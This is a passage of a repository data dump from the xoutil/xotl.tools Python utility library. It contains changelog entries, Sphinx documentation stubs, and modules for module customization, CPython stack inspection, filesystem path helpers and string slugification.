`~xoutil.deprecation.inject_deprecated`:func: can be deprecated now.\n\n- Add function `xoutil.deprecation.deprecate_linked`:func: to deprecate full\n modules imported from a linked version. The main example are all\n sub-modules of `xoutil.future`:mod:.\n\n- Add function `xoutil.deprecation.deprecate_module`:func: to deprecate full\n modules when imported.\n\n- The module `xoutil.string`:mod: suffered a major reorganization due to\n ambiguity use of Strings in Python.\n\n- Create ``__crop__`` protocol for small string representations, see\n `xoutil.clipping.crop`:func: for more information.\n\n Because `~xoutil.clipping`:mod: module is still **experimental**, definitive\n names of operator and main function must be validated before it could be\n considered definitive. Proposals are: \"crop\", \"small\", \"short\", \"compact\",\n \"abbr\".\n\n- Remove ``xoutil.connote`` that was introduced provisionally in 1.7.1.\n\n- Module `xoutil.params`:mod: was introduced provisionally in 1.7.1, but now\n has been fully recovered.\n\n - Add function `~xoutil.params.issue_9137`:func: -- Helper to fix issue 9137\n (self ambiguity).\n\n - Add function `~xoutil.params.check_count`:func: -- Checker for positional\n arguments actual count against constrains.\n\n - Add function `~xoutil.params.check_default`:func: -- Default value getter\n when passed as a last excess positional argument.\n\n - Add function `~xoutil.params.single`:func: -- Return true only when a\n unique argument is given.\n\n - Add function ``xoutil.params.keywords_only`` -- Decorator to make a\n function to accepts its keywords arguments as keywords-only.\n\n - Add function `~xoutil.params.pop_keyword_arg`:func: -- Tool to get a value\n from keyword arguments using several possible names.\n\n - Add class `~xoutil.params.ParamManager`:class: -- Parameter manager in a\n \"smart\" way.\n\n - Add class `~xoutil.params.ParamScheme`:class: -- Parameter scheme\n definition for a manager.\n\n - Add class `~xoutil.params.ParamSchemeRow`:class: -- Parameter scheme\n complement.\n\n - Remove ``xoutil.params.ParamConformer``.\n\n- Module `xoutil.values`:mod: was recovered adding several new features (old\n name ``xoutil.cl`` was deprecated).\n\n- Add **experimental** module `xoutil.fp`:mod: for Functional Programming\n stuffs.\n\n- Add **experimental** module `xoutil.tasking`:mod:.\n\n- Add `xoutil.symbols`:mod:. It replaces `!xoutil.logical`:mod: that was\n introduced in 1.7.0, but never documented.\n\n- Remove deprecated module ``xoutil.data``. Add\n `xoutil.objects.adapt_exception`:func:.\n\n- Remove deprecated `xoutil.dim.meta.Signature.isunit`:meth:.\n" }, { "alpha_fraction": 0.7678571343421936, "alphanum_fraction": 0.7678571343421936, "avg_line_length": 55, "blob_id": "4b96ebca03a3ef0e5610eb7437c19079067fc08d", "content_id": "9b3e97ac486c2400fa7c101dae5ef2aa5d963edb", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 56, "license_type": "permissive", "max_line_length": 55, "num_lines": 1, "path": "/docs/source/history/_changes-1.7.12.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- `xoutil.datetime.EmptyTimeSpan`:obj: is now pickable.\n" }, { "alpha_fraction": 0.7234042286872864, "alphanum_fraction": 0.7234042286872864, "avg_line_length": 30.33333396911621, "blob_id": "0c8ec1d5c1c2da537660606b972b8c74c9a6229d", "content_id": "5f243fc3cf47bc2a39ddabe39d6a8c0767a2245c", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 94, "license_type": "permissive", "max_line_length": 52, "num_lines": 3, "path": "/docs/source/history/_changes-1.7.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add `xoutil.iterators.ungroup`:func:.\n\n- Add `xoutil.future.datetime.get_next_month`:func:.\n" }, { "alpha_fraction": 0.6976743936538696, "alphanum_fraction": 0.7162790894508362, "avg_line_length": 34.83333206176758, "blob_id": "dc560703949a035f5acfc4453986af90351c617e", "content_id": "dcacdef95d042dbb9b83eba7cc24d3875ec707c2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 215, "license_type": "permissive", "max_line_length": 69, "num_lines": 6, "path": "/docs/source/history/_changes-1.9.9.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug `#4`_: `xoutil.decorator.meta.flat_decorator`:func: was not\n working in Python 3.\n\n- Deprecate `xoutil.decorator.meta.flat_decorator`:func:.\n\n.. _#4: https://gitlab.merchise.org/merchise/xoutil/issues/4\n" }, { "alpha_fraction": 0.6065720319747925, "alphanum_fraction": 0.6082342267036438, "avg_line_length": 31.31818199157715, "blob_id": "6f253f857a4d2d58d13ce89718b5c5f0706f54b5", "content_id": "9517a5d7491aeb92205c394be3ad025663624c07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7822, "license_type": "no_license", "max_line_length": 79, "num_lines": 242, "path": "/xotl/tools/modules.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Modules utilities.\"\"\"\n\nfrom types import ModuleType\n\n# TODO: Implement the concept of module descriptor\n\n\ndef force_module(ref=None):\n \"\"\"Load a module from a string or return module if already created.\n\n If `ref` is not specified (or integer) calling module is assumed looking\n in the stack.\n\n .. note:: Implementation detail\n\n Function used to inspect the stack is not guaranteed to exist in all\n implementations of Python.\n\n \"\"\"\n from importlib import import_module\n\n if isinstance(ref, ModuleType):\n return ref\n else:\n if ref is None:\n ref = 1\n if isinstance(ref, int):\n import sys\n\n frame = sys._getframe(ref)\n try:\n ref = frame.f_globals[\"__name__\"]\n finally:\n # As recommended to avoid memory leaks\n del frame\n if not isinstance(ref, str):\n if isinstance(ref, bytes):\n ref = ref.decode() # Python 3.x\n else:\n try:\n ref = ref.encode() # Python 2.x\n except Exception: # TODO: @med which exceptions expected?\n msg = \"invalid type '{}' for module name '{}'\"\n raise TypeError(msg.format(type(ref).__name__, ref))\n return import_module(ref)\n\n\n# TODO: Deprecate this method in favor of ``from <module> import *``\ndef copy_members(source=None, target=None):\n \"\"\"Copy module members from `source` to `target`.\n\n It's common in `xotl.tools` package to extend Python modules with the same\n name, for example `xotl.tools.datetime` has all public members of Python's\n `datetime`. `copy_members`:func: can be used to copy all members from the\n original module to the extended one.\n\n :param source: string with source module name or module itself.\n\n If not given, is assumed as the last module part name of `target`.\n\n :param target: string with target module name or module itself.\n\n If not given, target name is looked in the stack of caller module.\n\n :returns: Source module.\n :rtype: `ModuleType`\n\n .. warning:: Implementation detail\n\n Function used to inspect the stack is not guaranteed to exist in all\n implementations of Python.\n\n \"\"\"\n target = force_module(target or 2)\n if source is None:\n source = target.__name__.rsplit(\".\")[-1]\n if source == target.__name__:\n msg = '\"source\" and \"target\" modules must be different.'\n raise ValueError(msg)\n source = force_module(source)\n for attr in dir(source):\n if not attr.startswith(\"__\"):\n setattr(target, attr, getattr(source, attr))\n return source\n\n\nclass _CustomModuleBase(ModuleType):\n pass\n\n\ndef customize(module, custom_attrs=None, meta=None):\n \"\"\"Replaces a `module` by a custom one.\n\n Injects all kwargs into the newly created module's class. This allows to\n have module into which we may have properties or other type of\n descriptors.\n\n :param module: The module object to customize.\n\n :param custom_attrs: A dictionary of custom attributes that should be\n injected in the customized module.\n\n .. versionadded:: 1.4.2 Changes the API, no longer uses the\n ``**kwargs`` idiom for custom attributes.\n\n :param meta: The metaclass of the module type. This should be a subclass\n of `type`. We will actually subclass this metaclass to\n properly inject `custom_attrs` in our own internal\n metaclass.\n\n :returns: A tuple of ``(module, customized, class)`` with the module in\n the first place, `customized` will be True only if the module\n was created (i.e `customize`:func: is idempotent), and the\n third item will be the class of the module (the first item).\n\n \"\"\"\n if not isinstance(module, _CustomModuleBase):\n import sys\n\n meta_base = meta if meta else type\n\n class CustomModuleType(meta_base):\n def __new__(cls, name, bases, attrs):\n if custom_attrs:\n attrs.update(custom_attrs)\n return super().__new__(cls, name, bases, attrs)\n\n class CustomModule(_CustomModuleBase, metaclass=CustomModuleType):\n def __getattr__(self, attr):\n self.__dict__[attr] = result = getattr(module, attr)\n return result\n\n def __dir__(self):\n res = set(dir(module))\n if custom_attrs:\n res |= set(custom_attrs.keys())\n return list(res)\n\n sys.modules[module.__name__] = result = CustomModule(module.__name__)\n return result, True, CustomModule\n else:\n return module, False, type(module)\n\n\ndef modulemethod(func):\n \"\"\"Decorator that defines a module-level method.\n\n Simply a module-level method, will always receive a first argument `self`\n with the module object.\n\n \"\"\"\n import sys\n from functools import wraps\n\n self, _created, cls = customize(sys.modules[func.__module__])\n\n @wraps(func)\n def inner(*args, **kwargs):\n return func(self, *args, **kwargs)\n\n setattr(cls, func.__name__, func)\n return inner\n\n\ndef moduleproperty(getter, setter=None, deleter=None, doc=None, base=property):\n \"\"\"Decorator that creates a module-level property.\n\n The module of the `getter` is replaced by a custom implementation of the\n module, and the property is injected to the custom module's class.\n\n The parameter `base` serves the purpose of changing the base for the\n property. For instance, this allows you to have `memoized_properties\n <xotl.tools.objects.memoized_property>`:func: at the module-level::\n\n def memoized(self):\n return self\n memoized = moduleproperty(memoized, base=memoized_property)\n\n\n .. versionadded:: 1.6.1 Added the `base` parameter.\n\n \"\"\"\n import sys\n\n module = sys.modules[getter.__module__]\n module, _created, cls = customize(module)\n\n class prop(base):\n if getattr(base, \"setter\", False):\n\n def setter(self, func, _name=None):\n result = super().setter(func)\n setattr(cls, _name or func.__name__, result)\n return result\n\n if getattr(base, \"deleter\", False):\n\n def deleter(self, func, _name=None):\n result = super().deleter(func)\n setattr(cls, _name or func.__name__, result)\n return result\n\n result = prop(getter, doc=doc)\n name = getter.__name__\n setattr(cls, getter.__name__, result)\n if setter:\n result = result.setter(setter, _name=name)\n if deleter:\n result = result.deleter(deleter, _name=name)\n return result\n\n\ndef get_module_path(module):\n \"\"\"Gets the absolute path of a `module`.\n\n :param module: Either module object or a (dotted) string for the module.\n\n :returns: The path of the module.\n\n If the module is a package, returns the directory path (not the path to the\n ``__init__``).\n\n If `module` is a string and it's not absolute, raises a TypeError.\n\n \"\"\"\n from importlib import import_module\n from xotl.tools.fs.path import normalize_path\n\n mod = import_module(module) if isinstance(module, str) else module\n # The __path__ only exists for packages and does not include the\n # __init__.py\n path = mod.__path__[0] if hasattr(mod, \"__path__\") else mod.__file__\n return normalize_path(path)\n" }, { "alpha_fraction": 0.5047169923782349, "alphanum_fraction": 0.5047169923782349, "avg_line_length": 41.400001525878906, "blob_id": "929662cf38b9dd1cc7a1306bd2a6bc86cfc543a6", "content_id": "b83471dc2207cb9f430e660a67b0f7c4c201e41e", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 212, "license_type": "permissive", "max_line_length": 73, "num_lines": 5, "path": "/docs/source/xotl.tools/validators/identifiers.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.validators.identifiers`:mod: -- Simple identifiers validators\n=========================================================================\n\n.. automodule:: xotl.tools.validators.identifiers\n :members:\n" }, { "alpha_fraction": 0.5781487226486206, "alphanum_fraction": 0.5781487226486206, "avg_line_length": 31.950000762939453, "blob_id": "f881d4110853e30e9d427e06c756b1b4ca3f6c70", "content_id": "e1558a13752bab6a531ba7f4b9ce44bcfb62aee2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 659, "license_type": "permissive", "max_line_length": 77, "num_lines": 20, "path": "/docs/source/xotl.tools/dim.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "=====================================================================\n `xotl.tools.dim`:mod: - Facilities to work with `concrete numbers`_\n=====================================================================\n\n.. module:: xotl.tools.dim\n\nThe name 'dim' is a short of dimension. We borrow it from the topic\n`dimensional analysis`_, even though the scope of this module is less\nambitious.\n\nThis module is divided in two major parts: meta-definitions and applications.\n\n.. toctree::\n :glob:\n\n dim/meta\n dim/*\n\n.. _concrete numbers: https://en.wikipedia.org/wiki/Concrete_number\n.. _dimensional analysis: https://en.wikipedia.org/wiki/Dimensional_analysis\n" }, { "alpha_fraction": 0.6943231225013733, "alphanum_fraction": 0.7248908281326294, "avg_line_length": 37.16666793823242, "blob_id": "691d33db4fdaa6ac093f76ac931d12779904b106", "content_id": "c77d17ed2bf4a3013d84a136125887cc1c941d7b", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 229, "license_type": "permissive", "max_line_length": 78, "num_lines": 6, "path": "/docs/source/history/_changes-2.0.4.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Packaging fix: the python tag for releases in the 2.0 branch was incorrectly\n set to \"py2\". xoutil 2.0+ support only Python 3.4+.\n\n We're removing the wrongly tagged releases from PyPI__.\n\n__ https://pypi.org/project/xoutil\n" }, { "alpha_fraction": 0.5462241768836975, "alphanum_fraction": 0.5528841018676758, "avg_line_length": 27.30351448059082, "blob_id": "fb1233933dcdfcde563d9538d133db1734728cca", "content_id": "3b5f80032f170ef3a596868e6315c882e77d7289", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8860, "license_type": "no_license", "max_line_length": 78, "num_lines": 313, "path": "/xotl/tools/cpystack.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Utilities to inspect the CPython's stack.\"\"\"\n\nimport inspect\nfrom xotl.tools.deprecation import deprecated\n\n\n__all__ = (\n \"MAX_DEEP\",\n \"getargvalues\",\n \"error_info\",\n \"object_info_finder\",\n \"object_finder\",\n \"track_value\",\n \"iter_stack\",\n \"iter_frames\",\n)\n\nMAX_DEEP = 25\n\n\ndef getargvalues(frame):\n \"\"\"Inspects the given frame for arguments and returns a dictionary that\n maps parameters names to arguments values. If an `*` argument was passed\n then the key on the returning dictionary would be formatted as\n `<name-of-*-param>[index]`.\n\n For example in the function::\n\n >>> def autocontained(a, limit, *margs, **ks):\n ... import sys\n ... return getargvalues(sys._getframe())\n\n >>> autocontained(1, 12)['limit']\n 12\n\n >>> autocontained(1, 2, -10, -11)['margs[0]']\n -10\n\n \"\"\"\n from xotl.tools.values.simple import force_sequence_coerce as array\n from xotl.tools.future.itertools import flatten\n\n pos, args, kwds, values = inspect.getargvalues(frame)\n res = {}\n for keys in pos:\n if keys:\n res.update({key: values[key] for key in flatten(array(keys))})\n if args:\n i = 0\n for item in values[args]:\n res[\"%s[%s]\" % (args, i)] = item\n i += 1\n if kwds:\n res.update(values[kwds])\n return res\n\n\ndef __error_info(tb, *args, **kwargs):\n \"\"\"Internal function used by `error_info`:func: and\n `printable_error_info`:func:.\n\n \"\"\"\n # TODO: Formalize tests for this\n ALL = True\n res = []\n kwargs.update(dict.fromkeys(args, ALL))\n if kwargs:\n deep = 0\n processed = set()\n while tb and (deep < MAX_DEEP):\n frame = tb.tb_frame\n func_name = frame.f_code.co_name\n attrs1 = kwargs.get(func_name, None)\n attrs2 = kwargs.get(deep, None)\n if attrs1 or attrs2:\n processed.add(func_name)\n processed.add(deep)\n if (attrs1 is ALL) or (attrs2 is ALL):\n attrs = ALL\n else:\n attrs = list(attrs1) if attrs1 else []\n if attrs2:\n attrs.extend(attrs2)\n if attrs is ALL:\n item = frame.f_locals.copy()\n else:\n item = {key: frame.f_locals.get(key) for key in attrs}\n item[\"function-name\"] = func_name\n item[\"traceback-deep\"] = deep\n item[\"line-number\"] = tb.tb_lineno\n item[\"file-name\"] = frame.f_code.co_filename\n res.append(item)\n tb = tb.tb_next\n deep += 1\n for item in processed:\n if item in kwargs:\n del kwargs[item]\n if kwargs:\n res[\"unprocessed-items\"] = kwargs\n return res\n\n\ndef error_info(*args, **kwargs):\n \"\"\"Get error information in current trace-back.\n\n No all trace-back are returned, to select which are returned use:\n\n - ``args``: Positional parameters\n\n - If string, represent the name of a function.\n\n - If an integer, a trace-back level.\n\n Return all values.\n\n - ``kwargs``: The same as ``args`` but each value is a list of local\n names to return. If a value is ``True``, means all local variables.\n\n Return a list with a dict in each item.\n\n Example::\n\n >>> def foo(x):\n ... x += 1//x\n ... if x % 2:\n ... bar(x - 1)\n ... else:\n ... bar(x - 2)\n\n >>> def bar(x):\n ... x -= 1//x\n ... if x % 2:\n ... foo(x//2)\n ... else:\n ... foo(x//3)\n\n >>> try: # doctest: +SKIP\n ... foo(20)\n ... except:\n ... print(printable_error_info('Example', foo=['x'], bar=['x']))\n Example\n ERROR: integer division or modulo by zero\n ...\n\n \"\"\"\n import sys\n\n _error_type, _error, tb = sys.exc_info()\n return __error_info(tb, *args, **kwargs)\n\n\ndef printable_error_info(base, *args, **kwargs):\n \"\"\"Get error information in current trace-back.\n\n No all trace-back are returned, to select which are returned use:\n\n - ``args``: Positional parameters\n\n - If string, represent the name of a function.\n\n - If an integer, a trace-back level.\n\n Return all values.\n\n - ``kwargs``: The same as ``args`` but each value is a list of local\n names to return. If a value is ``True``, means all local variables.\n\n Return a formatted string with all information.\n\n See `error_info`:func: for an example.\n\n \"\"\"\n import sys\n\n _error_type, error, tb = sys.exc_info()\n if tb:\n res = \"%s\\n\\tERROR: %s\\n\\t\" % (base, error)\n info = __error_info(tb, *args, **kwargs)\n return res + \"\\n\\t\".join(str(item) for item in info)\n else:\n return \"\"\n\n\ndef object_info_finder(obj_type, arg_name=None, max_deep=MAX_DEEP):\n \"\"\"Find an object of the given type through all arguments in stack frames.\n\n Returns a tuple with the following values:\n (arg-value, arg-name, deep, frame).\n\n When no object is found\n None is returned.\n\n Arguments:\n object_type: a type or a tuple of types as in \"isinstance\".\n arg_name: the arg_name to find; if None find in all arguments\n max_deep: the max deep to enter in the stack frames.\n\n \"\"\"\n frame = inspect.currentframe()\n try:\n deep = 0\n res = None\n while (res is None) and (deep < max_deep) and (frame is not None):\n ctx = getargvalues(frame)\n d = {arg_name: ctx.get(arg_name)} if arg_name is not None else ctx\n for key in d:\n value = d[key]\n if isinstance(value, obj_type):\n res = (value, key, deep, frame)\n frame = frame.f_back\n deep += 1\n return res\n finally:\n del frame # As recommended in the Python's doc to avoid memory leaks\n\n\ndef object_finder(obj_type, arg_name=None, max_deep=MAX_DEEP):\n \"\"\"Find an object of the given type through all arguments in stack frames.\n\n The difference with `object_info_finder`:func: is that this function\n returns the object directly, not a tuple.\n\n \"\"\"\n finder = object_info_finder(obj_type, arg_name, max_deep)\n info = finder()\n return info[0] if info else None\n\n\ndef track_value(value, max_deep=MAX_DEEP):\n \"\"\"Find a value through all arguments in stack frames.\n\n Returns a dictionary with the full-context in the same level as \"value\".\n\n \"\"\"\n frame = inspect.currentframe().f_back.f_back\n deep = 0\n res = None\n while (res is None) and (deep < max_deep) and (frame is not None):\n ctx = getargvalues(frame)\n for _key in ctx:\n _value = ctx[_key]\n if (type(value) == type(_value)) and (value == _value):\n res = (ctx, _key)\n frame = frame.f_back\n deep += 1\n return res\n\n\ndef iter_stack(max_deep=MAX_DEEP):\n \"\"\"Iterates through stack frames until exhausted or `max_deep` is reached.\n\n To find a frame fulfilling a condition use::\n\n frame = next(f for f in iter_stack() if condition(f))\n\n .. versionadded:: 1.6.8\n\n \"\"\"\n # Using the previous pattern, functions `object_info_finder`,\n # `object_finder` and `track_value` can be reprogrammed or deprecated.\n\n frame = inspect.currentframe()\n try:\n deep = 0\n while (deep < max_deep) and (frame is not None):\n yield frame\n frame = frame.f_back\n deep += 1\n finally:\n del frame # As recommended in the Python's doc to avoid memory leaks\n\n\n@deprecated(iter_stack)\ndef iter_frames(max_deep=MAX_DEEP):\n \"\"\"Iterates through all stack frames.\n\n Returns tuples with the following::\n\n (deep, filename, line_no, start_line).\n\n .. versionadded:: 1.1.3\n\n .. deprecated:: 1.6.8 The use of params `attr_filter` and `value_filter`.\n\n \"\"\"\n # TODO: @manu Use this in all previous functions with same structure\n frame = inspect.currentframe()\n try:\n deep = 0\n while (deep < max_deep) and (frame is not None):\n yield (\n deep,\n frame.f_code.co_filename,\n frame.f_lineno,\n frame.f_code.co_firstlineno,\n frame.f_locals,\n )\n frame = frame.f_back\n deep += 1\n finally:\n del frame # As recommended in the Python's doc to avoid memory leaks\n\n\ndel deprecated\n" }, { "alpha_fraction": 0.7289156913757324, "alphanum_fraction": 0.7289156913757324, "avg_line_length": 32.20000076293945, "blob_id": "2463cd5a7b3d4dfb74010379799e07cf38f8f8fe", "content_id": "b93a307d4e31606116bf4677b74257e9075793f2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 166, "license_type": "permissive", "max_line_length": 77, "num_lines": 5, "path": "/docs/source/history/_changes-1.7.5.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Added `xoutil.datetime.TimeSpan`:class:.\n\n- Added the module `xoutil.infinity`:mod:.\n\n- Added the keyword argument `on_error` to `xoutil.bound.until_errors`:func:.\n" }, { "alpha_fraction": 0.7540983557701111, "alphanum_fraction": 0.7540983557701111, "avg_line_length": 60, "blob_id": "ca8a234d0f99682ccf063b9493b4ec08006fe26e", "content_id": "fc1bd8ef3014bb116ac8d6e323948efceaeacc9f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 61, "license_type": "permissive", "max_line_length": 60, "num_lines": 1, "path": "/docs/source/history/_changes-2.1.7.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add `xotl.tools.fp.itertools.kleisli_compose_foldl`:func:.\n" }, { "alpha_fraction": 0.6079632639884949, "alphanum_fraction": 0.6100050806999207, "avg_line_length": 26.398601531982422, "blob_id": "3df2ea5f127a894b154f7cff3c971b50777c5a8c", "content_id": "88482529d25a639e13c9b0d901e544211325c737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3919, "license_type": "no_license", "max_line_length": 83, "num_lines": 143, "path": "/xotl/tools/fs/path.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extensions to os.path\n\nFunctions inside this module must not have side-effects on the\nfile-system. This module re-exports (without change) several functions from the\n`os.path`:mod: standard module.\n\n\"\"\"\n\nimport sys\nfrom os.path import abspath, expanduser, dirname, sep, normpath, join as _orig_join\n\nfrom xotl.tools.future.functools import power as pow_\n\n__all__ = (\n \"abspath\",\n \"expanduser\",\n \"dirname\",\n \"sep\",\n \"normpath\",\n \"rtrim\",\n \"fix_encoding\",\n \"join\",\n \"normalize_path\",\n \"shorten_module_filename\",\n \"shorten_user\",\n)\n\n\n# TODO: import all in \"from os.path import *\"\n\n\ndef rtrim(path, n=1):\n \"\"\"Trims the last `n` components of the pathname `path`.\n\n This basically applies `n` times the function `os.path.dirname` to `path`.\n\n `path` is normalized before proceeding (but not tested to exists).\n\n .. versionchanged:: 1.5.5 `n` defaults to 1. In this case rtrim is\n identical to `os.path.dirname`:func:.\n\n Example::\n\n >>> rtrim('/tmp/a/b/c/d', 3)\n '/tmp/a'\n\n # It does not matter if `/` is at the end\n >>> rtrim('/tmp/a/b/c/d/', 3)\n '/tmp/a'\n\n \"\"\"\n return pow_(dirname, n)(normalize_path(path))\n\n\ndef fix_encoding(name, encoding=None):\n \"\"\"Fix encoding of a file system resource name.\n\n `encoding` is ignored if `name` is already a `str`.\n\n \"\"\"\n if not isinstance(name, str):\n if not encoding:\n from xotl.tools.future.codecs import force_encoding\n\n encoding = force_encoding(sys.getfilesystemencoding())\n fixer = name.decode if isinstance(name, bytes) else name.encode\n return fixer(encoding)\n else:\n return name\n\n\ndef join(base, *extras):\n \"\"\"Join two or more pathname components, inserting '/' as needed.\n\n If any component is an absolute path, all previous path components\n will be discarded.\n\n Normalize path (after join parts), eliminating double slashes, etc.\n\n \"\"\"\n try:\n path = _orig_join(base, *extras)\n except Exception: # TODO: @med which exceptions expected?\n base = fix_encoding(base)\n extras = [fix_encoding(extra) for extra in extras]\n path = _orig_join(base, *extras)\n return normpath(path)\n\n\ndef normalize_path(base, *extras):\n \"\"\"Normalize path by:\n\n - expanding '~' and '~user' constructions.\n - eliminating double slashes\n - converting to absolute.\n\n \"\"\"\n # FIXME: [med] Redundant \"path\" in name \"xotl.tools.fs.path.normalize_path\"\n try:\n path = _orig_join(base, *extras)\n except Exception: # TODO: @med which exceptions expected?\n path = join(base, *extras)\n return abspath(expanduser(path))\n\n\ndef shorten_module_filename(filename):\n \"\"\"A filename, normally a module o package name, is shortened looking his\n head in all python path.\n\n \"\"\"\n path = sys.path[:]\n path.sort(lambda x, y: len(y) - len(x))\n for item in path:\n if item and filename.startswith(item):\n filename = filename[len(item) :]\n if filename.startswith(sep):\n filename = filename[len(sep) :]\n for item in (\"__init__.py\", \"__init__.pyc\"):\n if filename.endswith(item):\n filename = filename[: -len(item)]\n if filename.endswith(sep):\n filename = filename[: -len(sep)]\n return shorten_user(filename)\n\n\ndef shorten_user(filename):\n \"\"\"A filename is shortened looking for the (expantion) $HOME in his head\n and replacing it by '~'.\n\n \"\"\"\n home = expanduser(\"~\")\n if filename.startswith(home):\n filename = _orig_join(\"~\", filename[len(home) :])\n return filename\n" }, { "alpha_fraction": 0.5790960192680359, "alphanum_fraction": 0.590395450592041, "avg_line_length": 32.89361572265625, "blob_id": "c3aceb1f90852ebbd00078bb9320a89483f216a8", "content_id": "55aab8d7a9d26a32c6f01d4366acd2240214fe1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3187, "license_type": "no_license", "max_line_length": 88, "num_lines": 94, "path": "/xotl/tools/web.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Utils for Web applications.\"\"\"\n\n__all__ = [\"slugify\"]\n\n\n# TODO: Why not deprecate this and use standard `xotl.tools.string.slugify`.\ndef slugify(\n s, entities=True, decimal=True, hexadecimal=True\n): # pragma: no cover # noqa\n \"\"\"Convert a string to a slug representation.\n\n Normalizes string, converts to lower-case, removes non-alpha characters,\n and converts spaces to hyphens.\n\n Parts from http://www.djangosnippets.org/snippets/369/\n\n >>> slugify(\"Manuel Vázquez Acosta\") # doctest: +SKIP\n 'manuel-vazquez-acosta'\n\n If `s` and `entities` is True (the default) all HTML entities\n are replaced by its equivalent character before normalization::\n\n >>> slugify(\"Manuel V&aacute;zquez Acosta\") # doctest: +SKIP\n 'manuel-vazquez-acosta'\n\n If `entities` is False, then no HTML-entities substitution is made::\n\n >>> value = \"Manuel V&aacute;zquez Acosta\"\n >>> slugify(value, entities=False) # doctest: +SKIP\n 'manuel-v-aacute-zquez-acosta'\n\n If `decimal` is True, then all entities of the form ``&#nnnn`` where\n `nnnn` is a decimal number deemed as a unicode codepoint, are replaced by\n the corresponding unicode character::\n\n >>> slugify('Manuel V&#225;zquez Acosta') # doctest: +SKIP\n 'manuel-vazquez-acosta'\n\n >>> value = 'Manuel V&#225;zquez Acosta'\n >>> slugify(value, decimal=False) # doctest: +SKIP\n 'manuel-v-225-zquez-acosta'\n\n\n If `hexadecimal` is True, then all entities of the form ``&#nnnn`` where\n `nnnn` is a hexdecimal number deemed as a unicode codepoint, are replaced\n by the corresponding unicode character::\n\n >>> slugify('Manuel V&#x00e1;zquez Acosta') # doctest: +SKIP\n 'manuel-vazquez-acosta'\n\n >>> slugify('Manuel V&#x00e1;zquez Acosta', hexadecimal=False) # doctest: +SKIP # noqa\n 'manuel-v-x00e1-zquez-acosta'\n\n .. deprecated:: 2.1.0 Use `xotl.tools.strings.slugify`:func:.\n\n \"\"\"\n import re\n from xotl.tools.string import slugify\n from xotl.tools.future.codecs import safe_decode\n\n if not isinstance(s, str):\n s = safe_decode(s)\n if entities:\n try:\n from htmlentitydefs import name2codepoint\n except ImportError:\n # Py3k: The ``htmlentitydefs`` module has been renamed to\n # ``html.entities`` in Python 3\n from html.entities import name2codepoint\n s = re.sub(\n str(\"&(%s);\") % str(\"|\").join(name2codepoint),\n lambda m: chr(name2codepoint[m.group(1)]),\n s,\n )\n if decimal:\n try:\n s = re.sub(r\"&#(\\d+);\", lambda m: chr(int(m.group(1))), s)\n except Exception: # TODO: @med which exceptions are expected?\n pass\n if hexadecimal:\n try:\n s = re.sub(r\"&#x([\\da-fA-F]+);\", lambda m: chr(int(m.group(1), 16)), s)\n except Exception: # TODO: @med which exceptions are expected?\n pass\n return slugify(s, \"-\")\n" }, { "alpha_fraction": 0.6235184073448181, "alphanum_fraction": 0.6279631853103638, "avg_line_length": 26.817787170410156, "blob_id": "ec5d8ea1ccba6a9a3d7819cd8126612fadc4dca8", "content_id": "342843e00697f5ffef21903bb9af879f6b4334fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 